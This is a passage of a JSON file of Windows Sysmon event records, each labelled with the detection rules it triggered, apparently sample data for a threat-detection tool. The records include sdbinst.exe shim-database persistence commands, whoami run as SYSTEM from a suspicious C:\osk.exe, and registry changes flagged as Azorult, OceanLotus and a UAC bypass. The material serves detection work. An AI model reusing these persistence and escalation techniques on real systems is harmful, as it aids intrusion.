System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-13 18:03:19.497"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17287,"Execution":{"#attributes":{"ProcessID":276,"ThreadID":1000}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-13T18:03:19.681478Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"365ABB72-528D-5C91-0000-0010AD570000","ProcessId":500,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\ProductType","UtcTime":"2019-03-19 20:35:25.831"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966215,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:41:11.979726Z"}},"Version":2}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55A1-5C91-0000-0010AB8C0700","ProcessId":2112,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:48:33.279"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966368,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:48:33.439582Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55A1-5C91-0000-0010D6960700","ProcessId":2368,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:48:33.639"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966382,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:48:33.870201Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55D7-5C91-0000-001067BD0700","ProcessId":2236,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:27.697"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966388,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:49:27.787731Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55D8-5C91-0000-001060C90700","ProcessId":3648,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:28.058"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966403,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:49:28.158264Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55E8-5C91-0000-001037DF0700","ProcessId":4052,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:44.712"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966408,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:49:44.792182Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55E9-5C91-0000-00102EEB0700","ProcessId":2104,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:45.052"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966423,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:49:45.162715Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-5689-5C91-0000-0010543F0800","ProcessId":3896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:52:25.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966429,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:52:25.933892Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-568A-5C91-0000-0010D24B0800","ProcessId":4072,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:52:26.194"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966444,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:52:26.364512Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-569F-5C91-0000-001012610800","ProcessId":2548,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:52:47.054"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966449,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:52:47.124363Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-569F-5C91-0000-0010D96C0800","ProcessId":3140,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:52:47.364"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966464,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:52:47.474867Z"}},"Version":5}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Users\\user01\\Desktop\\titi.sdb\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\user01\\Desktop\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-57EC-5C91-0000-001097810900","ProcessId":2848,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:58:20.894"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966480,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:58:20.994444Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery","Whoami Execution Anomaly"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=0EBF71E33EF09CA65D9683AFA999C473,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-528D-5C91-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"c:\\osk.exe\" ","ParentImage":"C:\\osk.exe","ParentProcessGuid":"365ABB72-57FB-5C91-0000-00104FD40900","ParentProcessId":2128,"ProcessGuid":"365ABB72-5804-5C91-0000-001044DE0900","ProcessId":2456,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-03-19 20:58:44.187"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966501,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:58:44.237867Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden","UtcTime":"2019-03-19 21:20:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966533,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T21:20:32.298766Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt","UtcTime":"2019-03-19 21:20:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966534,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T21:20:32.298766Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden","UtcTime":"2019-03-19 21:20:35.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966535,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T21:20:35.603518Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\"%%ProgramFiles%%\\Windows NT\\Accessories\\WORDPAD.EXE\" \"%%1\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"365ABB72-5D94-5C91-0000-001080E90F00","ProcessId":3840,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106_CLASSES\\sdb_auto_file\\shell\\open\\command\\(Default)","UtcTime":"2019-03-19 21:22:33.182"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966543,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T21:22:33.202617Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"WORDPAD.EXE","EventType":"SetValue","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"365ABB72-5D94-5C91-0000-001080E90F00","ProcessId":3840,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.sdb\\OpenWithList\\a","UtcTime":"2019-03-19 